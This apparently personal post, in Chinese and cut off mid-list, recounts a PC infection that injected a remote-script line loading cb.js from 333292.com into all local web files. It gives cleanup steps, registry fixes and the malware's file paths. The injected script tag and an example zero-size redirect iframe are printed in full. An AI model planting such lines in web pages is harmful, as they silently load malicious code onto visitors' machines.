http://www.333292.com/cb.js中毒解决方法
最近笔记本中了病毒,笔记本是没有用杀毒软件的,只是用了一个叫冰封系统的还
原软件,每次我上网的时候就打开它,重启后系统会还原,本想就算中毒也没事,反
正会还原,有一次,在浏览网页的时候发现,自动打开了RealPlayer软件,也觉得奇
怪的了,自己又没看电影,怎么会打开呢,当时也没在意,就随手关了它,大约一小时
后,用一个自己公司开发的收银系统软件时,系统提示日期出错,一看日期,1900年,
怎么搞的,谁调了日期?不管这么多,调回来,然后重启系统,用奇虎落360一扫描电
脑,哗,中了N个木马和盗号程序,后来想用ghost原还系统,发面以前做的ghost备份
都不见了,原来中的病毒可以穿过还原软件,只好重装系统,花了两小时装好系统,
杀毒完后,打完系统补丁,装完常用软件,正准备更新公司网站时,Macromedia
Dreamweaver 操作时提示出错,然后用文档的方式打开,一看发现最后一行多语句
<script language=javascript src=http://www.333292.com/cb.js></script>打
开其它文件一看,发现机子上所有的.asp.htm.html文件被加了以下语句
<script language=javascript src=http://www.333292.com/cb.js></script>
找了一个批量替换的软件把<script language=javascript
src=http://www.333292.com/cb.js></script>给替换掉,可以在
http://www.ascpos.cn/Chinese/Bs_DownloadShow.asp?Bs_DownID=41这里下载
上网一查,发现感染网页文件,手动删除后,重起电脑又有了,还好,我已经重装系统
,和还没有打开过感染的网页文件,替换完后就没事了.
目前大量WEB服务器中毒的同时,即使杀完病毒,还有后遗症就是病毒变种还会感
染硬盘上所有以html,htm,asp等网页文件,如:333292.com在网页文件尾部加
入如<iframe src="http://*******" width="0" height="0">等病
毒代码,这行代码只是起到一个网页跳转的作用,打开这网页就会跳转到有病毒
的网站上,杀软是查不出来的!你电脑上所有的网页文件都不敢直接打开了
手工处理办法:
2 、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1)使用安天木马防线“进程管理”关闭病毒进程
(2)恢复注册表,显示隐藏的系统文件
[HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Explorer\Advanced]
新建键值:DWORD:"ShowSuperHidden"="0"
原键值:DWORD:"ShowSuperHidden"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
新建键值:字串:"Type"="checkbox2"
原键值:字串:"Type"="checkbox"
(3)删除病毒文件:
%HomeDrive%\autorun.inf
%HomeDrive%\ncltkyp.exe %DriveLetter%\autorun.inf
%DriveLetter%\ncltkyp.exe
%ProgramFiles%\CommonFiles
\MicrosoftShared\huatatq.exe
%ProgramFiles%\Common Files
\Microsoft Shared\kljimyq.inf
%ProgramFiles%\Common Files
\System\kljimyq.inf
%ProgramFiles%\Common Fi
